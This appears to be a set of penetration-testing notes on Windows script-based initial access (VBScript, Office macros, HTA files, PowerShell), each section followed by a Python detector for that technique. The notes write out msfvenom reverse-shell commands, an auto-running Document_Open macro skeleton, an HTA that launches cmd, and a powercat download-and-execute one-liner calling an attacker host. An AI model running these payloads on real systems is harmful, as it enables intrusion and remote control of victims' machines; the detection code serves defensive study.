## Windows Script Host (WSH)

### Visual Basic Script (VBScript)

- `cscript file.vbs`: command-line scripts (console host)
- `wscript file.vbs`: UI scripts (windowed host)
- Example (watch out for the whitespace after the `cmd.exe` path: it has to be included, otherwise the path and the script name are concatenated into one token)

```vbscript
Set shell = WScript.CreateObject("WScript.Shell")
' Run: command line, window style (0 = hidden), wait until it returns
shell.Run "C:\Windows\System32\cmd.exe " & WScript.ScriptFullName, 0, True
```

- The `/e:` switch selects the script engine explicitly, so the file does not need a `.vbs` extension:

```
c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
```
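The `wscript /e:VBScript shell.txt` pattern above is what a defender would look for in process-creation telemetry: a script host forced onto an engine, a file without a script extension, or a script host spawned by an Office application. The following is an added example (not part of these notes) that runs such checks over constructed log lines; the `Image|CommandLine|ParentImage` field layout, the extension list and the parent-process list are assumptions for the demo.

```python
"""Flag suspicious Windows Script Host launches in process-creation logs.

Added example, not part of the original notes. Each constructed log line
below has the shape "Image|CommandLine|ParentImage" (a reduced Sysmon
Event ID 1 record; the field layout is an assumption for this demo).
"""
import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Extensions WSH maps to a script engine on its own; anything else only runs
# because the engine was forced with /E:, as in the shell.txt example above.
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
USER_WRITABLE = ("\\temp\\", "\\downloads\\", "\\appdata\\")

SAMPLE_LOGS = [  # constructed sample records
    r"C:\Windows\System32\wscript.exe|wscript /e:VBScript c:\Users\user\Documents\shell.txt|C:\Windows\explorer.exe",
    r"C:\Windows\System32\cscript.exe|cscript //nologo C:\Scripts\inventory.vbs|C:\Windows\System32\svchost.exe",
    r"C:\Windows\System32\wscript.exe|wscript C:\Users\user\AppData\Local\Temp\invoice.js|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r"C:\Windows\System32\notepad.exe|notepad.exe readme.txt|C:\Windows\explorer.exe",
]


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(line):
    """Return the list of reason tags for one log line (empty = nothing flagged)."""
    image, cmdline, parent = line.split("|", 2)
    if basename(image) not in SCRIPT_HOSTS:
        return []
    reasons = []
    args = split_cmdline(cmdline)[1:]  # drop the host executable itself
    # WSH switches start with / or //; the first other token is the script file
    script = next((a.strip('"') for a in args if not a.startswith("/")), None)
    if script is not None:
        _stem, dot, ext = script.lower().rpartition(".")
        if ("." + ext if dot else "") not in SCRIPT_EXTENSIONS:
            reasons.append("non-script-extension")
        if any(marker in script.lower() for marker in USER_WRITABLE):
            reasons.append("user-writable-path")
    if any(a.lower().startswith(("/e:", "//e:")) for a in args):
        reasons.append("engine-override")
    if basename(parent) in OFFICE_PARENTS:
        reasons.append("office-parent")
    return reasons


def scan(lines):
    """Map the index of each flagged line to its reasons."""
    return {i: r for i, line in enumerate(lines) if (r := analyze(line))}


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOGS).items():
        print(i, reasons, SAMPLE_LOGS[i].split("|")[1])
```

Only the first and third sample lines are flagged; the scheduled `inventory.vbs` run under `svchost.exe` passes, which is the point of combining extension, switch and parent checks rather than alerting on every `wscript.exe` start.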
## Visual Basic for Applications (VBA)

- Macros can access the Windows API
- Open Word, go to View --> Macros, give the macro a name and under "Macros in" select the document
- Create a reverse shell:

```shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
```

- Insert it into the following macro content; the entry point is `Workbook_Open()` for Excel and `Document_Open()` for Word macros:

```vba
Sub Document_Open()
    SHELL
End Sub

Sub AutoOpen()
    SHELL
End Sub

Sub SHELL()
    <reverse shell goes here>
End Sub
```

- Save the document in a macro-supporting file format such as Word 97-2003 Template or Word 97-2003 Document

## HTML Application (HTA)

- An HTML file including some kind of scripting language like JS, VBScript or ActiveX; `mshta` is used to execute it

### POC

- The file is downloaded from the attacker's web server
- The file should look like:

```html
<html>
<body>
<script>
var shell = 'cmd.exe';
new ActiveXObject('WScript.Shell').Run(shell);
</script>
</body>
</html>
```

### Reverse Shell

- Craft a reverse shell via `msfvenom`:

```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta
```

- Or via `msfconsole`:

```
use exploit/windows/misc/hta_server
```
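Both the macro skeleton and the HTA above rely on the same two properties: an entry point that runs without a click (`Document_Open`, `AutoOpen`, `Workbook_Open`; for an HTA simply being opened by `mshta`) and a call that spawns a process (`CreateObject("WScript.Shell")`, `new ActiveXObject('WScript.Shell')`). The following is an added example, not part of these notes, that triages plain-text macro source and HTA content for exactly those constructs. It works on text only: for a real `.doc`/`.dot` file the VBA source would first have to be extracted (for instance with oletools' `olevba`). The two samples are constructed from the page's skeletons, with a `WScript.Shell` call standing in for the `<reverse shell goes here>` placeholder; the indicator names and the verdict thresholds are assumptions for the demo.

```python
"""Static triage of macro (VBA) source and HTA content for auto-execute
entry points and process-launching calls.

Added example, not from the original notes. Samples are constructed from the
page's skeletons; indicator names and verdict rules are demo assumptions.
"""
import re

VBA_INDICATORS = {
    # Procedures Office runs without user interaction (Document_Open for Word,
    # Workbook_Open for Excel, AutoOpen/Auto_Open as legacy names)
    "auto-exec-entry": re.compile(
        r"\bSub\s+(AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec|AutoClose)\s*\(", re.I),
    "object-creation": re.compile(r"\bCreateObject\s*\(", re.I),
    "wscript-shell": re.compile(r"WScript\.Shell", re.I),
    # Declare statements are how a macro reaches the Windows API directly
    "win32-api-declare": re.compile(r"\bDeclare\s+(PtrSafe\s+)?(Function|Sub)\b", re.I),
}

HTA_INDICATORS = {
    "activex-shell": re.compile(
        r"ActiveXObject\s*\(\s*['\"](WScript\.Shell|Shell\.Application)['\"]", re.I),
    "powershell-launch": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "cmd-launch": re.compile(r"\bcmd(\.exe)?\b", re.I),
}

AUTO_EXEC_NAME = re.compile(r"\bSub\s+(\w+)\s*\(", re.I)
AUTO_EXEC_SET = {"autoopen", "auto_open", "document_open", "workbook_open", "autoexec", "autoclose"}
LAUNCH_INDICATORS = {"object-creation", "wscript-shell", "win32-api-declare",
                     "activex-shell", "powershell-launch", "cmd-launch"}

VBA_SAMPLE = """\
Sub Document_Open()
    SHELL
End Sub

Sub AutoOpen()
    SHELL
End Sub

Sub SHELL()
    ' constructed stand-in for the page's <reverse shell goes here> placeholder
    CreateObject("WScript.Shell").Run "cmd.exe", 0
End Sub
"""

HTA_SAMPLE = """\
<html>
<body>
<script>
var shell = 'cmd.exe';
new ActiveXObject('WScript.Shell').Run(shell);
</script>
</body>
</html>
"""

BENIGN_VBA = """\
Sub FormatReport()
    ActiveDocument.Range.Font.Bold = True
End Sub
"""


def detect_kind(text):
    """HTA content carries HTML tags; everything else is treated as VBA source."""
    return "hta" if re.search(r"<(html|script|hta:application)\b", text, re.I) else "vba"


def triage(text, kind=None):
    """Return the sorted list of indicator names that fire for this text."""
    kind = kind or detect_kind(text)
    table = HTA_INDICATORS if kind == "hta" else VBA_INDICATORS
    return sorted(name for name, rx in table.items() if rx.search(text))


def entry_points(vba_text):
    """Names of auto-executing procedures, in source order."""
    return [m.group(1) for m in AUTO_EXEC_NAME.finditer(vba_text)
            if m.group(1).lower() in AUTO_EXEC_SET]


def verdict(text, kind=None):
    """'high' when the content both auto-executes and can launch a process."""
    kind = kind or detect_kind(text)
    hits = set(triage(text, kind))
    launches = hits & LAUNCH_INDICATORS
    if kind == "hta":
        return "high" if launches else "low"  # an HTA's script runs as soon as mshta opens it
    if "auto-exec-entry" in hits and launches:
        return "high"
    return "medium" if hits else "low"


if __name__ == "__main__":
    for label, sample in (("macro", VBA_SAMPLE), ("hta", HTA_SAMPLE), ("benign macro", BENIGN_VBA)):
        print(label, verdict(sample), triage(sample), entry_points(sample))
```

`entry_points` separates the "why does it run" question from the "what does it run" question: a document whose only hit is `Document_Open` with no launch indicator is worth a look but is not the dropper pattern these notes describe, while the `CreateObject`-plus-`AutoOpen` pairing is.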
## PowerShell

- The PowerShell execution policy can be checked via `Get-ExecutionPolicy`
- Set the policy via `Set-ExecutionPolicy -Scope CurrentUser RemoteSigned`
- Bypass it via `powershell -ex bypass -File shell.ps1` (the execution policy is a safety setting against accidental script execution, not a security boundary, which is why a per-process switch overrides it)
- Host powercat on the attacker machine and load it on the target via:

```
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
```

- Or use `msfvenom`:

```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
```
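Because the execution policy is not a boundary, the defensive signal is the command line itself: an `-ExecutionPolicy Bypass` switch, an `IEX(...DownloadString(...))` cradle like the powercat one-liner above, or an `-EncodedCommand` argument hiding either. The following is an added example, not part of these notes, that inspects PowerShell command lines for those patterns and decodes encoded commands (base64 of the UTF-16LE script text). The sample lines are constructed; the second mirrors the page's powercat command with `<attacker-IP>` left as a placeholder. The parameter-prefix rules follow powershell.exe's documented short forms (`-ex`/`-ep` for `-ExecutionPolicy`, `-e`/`-ec`/`-enc` for `-EncodedCommand`); the finding names are demo assumptions.

```python
"""Inspect PowerShell command lines for execution-policy bypass, download
cradles and -EncodedCommand payloads.

Added example, not from the original notes. Sample command lines are
constructed; the parameter prefixes follow powershell.exe's documented
short forms (-ex/-ep for -ExecutionPolicy, -e/-ec/-enc for -EncodedCommand).
"""
import base64
import re

# IEX/Invoke-Expression fed by a web download within the same command text
CRADLE = re.compile(
    r"\b(IEX|Invoke-Expression)\b.*\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Net\.WebClient)\b",
    re.I | re.S)
POLICY_PARAM = re.compile(r"-(ex\w*|ep\w*)", re.I)   # unambiguous prefixes of -ExecutionPolicy
ENCODED_PARAM = re.compile(r"-(e|ec|en\w*)", re.I)   # -e, -ec, -enc, -EncodedCommand

DECODED_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
# -EncodedCommand takes base64 of the UTF-16LE script text (constructed here)
ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16-le")).decode("ascii")

SAMPLES = [  # constructed command lines
    "powershell -ex bypass -File shell.ps1",
    "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd\"",
    f"powershell -nop -w hidden -enc {ENCODED_SAMPLE}",
    r"powershell -NoProfile -File C:\Scripts\backup.ps1",
]


def tokenize(cmdline):
    """Split on whitespace, keeping double-quoted arguments as one token."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def decode_encoded_command(b64):
    """Reverse the -EncodedCommand encoding: base64 -> UTF-16LE text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def analyze(cmdline):
    """Return a dict of findings for one command line (empty dict = nothing flagged)."""
    tokens = tokenize(cmdline)
    findings = {}
    script_text = cmdline  # grows with anything we manage to decode
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1].strip('"') if i + 1 < len(tokens) else ""
        if POLICY_PARAM.fullmatch(tok) and nxt.lower() in ("bypass", "unrestricted"):
            findings["policy-bypass"] = nxt.lower()
        elif ENCODED_PARAM.fullmatch(tok) and nxt:
            try:
                decoded = decode_encoded_command(nxt)
            except (ValueError, UnicodeDecodeError):
                continue  # not a well-formed encoded command
            findings["encoded-command"] = decoded
            script_text += "\n" + decoded
    if CRADLE.search(script_text):
        findings["download-cradle"] = True
    return findings


if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line))
```

Decoding before matching is what makes the third sample light up: on the raw command line only `-enc` is visible, and the cradle inside it is found solely because the decoded text is appended to the searched string. Where Script Block Logging (event ID 4104) is enabled the decoded body is logged anyway, so this check matters most for hosts where only process-creation telemetry exists.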